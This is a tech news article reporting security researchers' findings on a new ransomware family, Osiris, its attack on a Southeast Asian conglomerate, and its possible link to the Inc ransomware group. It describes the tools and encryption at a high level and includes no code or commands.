A new ransomware family called Osiris is being linked to an attack on a major conglomerate in Southeast Asia late last year, raising fresh concerns that experienced threat actors are behind what appears to be a newly emergent strain of ransomware.
According to new research published today by Symantec and the Carbon Black Threat Hunter Team, Osiris is a distinct ransomware family with no known connection to existing ransomware strains. The malware was first detected being used in a targeted intrusion in November and exhibits technical and operational traits that suggest it is being wielded by seasoned attackers rather than inexperienced operators.
The developers of Osiris are unknown, but Carbon Black’s researchers have found indicators that the ransomware may be linked to campaigns previously undertaken by the Inc ransomware group.
The attackers used a wide range of so-called living-off-the-land and dual-use tools, along with a malicious driver known as Poortry, that the researchers suggest is likely part of a “bring-your-own-vulnerable-driver attack” to disable security software. The exfiltration of stolen data to Wasabi cloud storage and the use of a Mimikatz variant with the same file name previously observed in Inc ransomware attacks also suggest the possibility of operational overlap.
Under the hood, Osiris includes many of the features expected of modern ransomware. The ransomware can terminate processes and services, selectively encrypt files and folders and append a “.Osiris” extension to affected files while deleting volume shadow copies. The malware also uses a hybrid encryption scheme combining elliptic curve cryptography with AES-128-CTR to generate a unique key per file and leveraging asynchronous I/O for performance.
As is typical with many forms of ransomware, after encryption, Osiris victims receive a ransom note directing them to a negotiation portal and listing allegedly stolen data.
Though some parts of Osiris are typical of existing ransomware, there are some key differences in methodology. In Osiris attacks, data is stolen several days before ransomware deployment using Rclone and the attackers deploy tools such as Netscan, Netexec and MeshAgent, alongside a modified version of the Rustdesk remote access tool disguised as “WinZip Remote Desktop” to evade detection.
How worried security teams should be about the emergence of Osiris, however, is not as yet determined.
“The impact this new Osiris ransomware will have on the ransomware landscape in general remains to be seen,” the researchers note. “However, it is an effective encryption payload that appears to be wielded by experienced attackers. With the constant shifting sands of the ransomware landscape, the emergence of a new ransomware family is always something to keep an eye on.”
Image: SiliconANGLE/Ideogram
Support our mission to keep content open and free by engaging with theCUBE community. Join theCUBE’s Alumni Trust Network, where technology leaders connect, share intelligence and create opportunities.
- 15M+ viewers of theCUBE videos, powering conversations across AI, cloud, cybersecurity and more
- 11.4k+ theCUBE alumni — Connect with more than 11,400 tech and business leaders shaping the future through a unique trusted-based network.
About SiliconANGLE Media
SiliconANGLE Media is a recognized leader in digital media innovation, uniting breakthrough technology, strategic insights and real-time audience engagement. As the parent company of SiliconANGLE, theCUBE Network, theCUBE Research, CUBE365, theCUBE AI and theCUBE SuperStudios — with flagship locations in Silicon Valley and the New York Stock Exchange — SiliconANGLE Media operates at the intersection of media, technology and AI.
Founded by tech visionaries John Furrier and Dave Vellante, SiliconANGLE Media has built a dynamic ecosystem of industry-leading digital media brands that reach 15+ million elite tech professionals. Our new proprietary theCUBE AI Video Cloud is breaking ground in audience interaction, leveraging theCUBEai.com neural network to help technology companies make data-driven decisions and stay at the forefront of industry conversations.
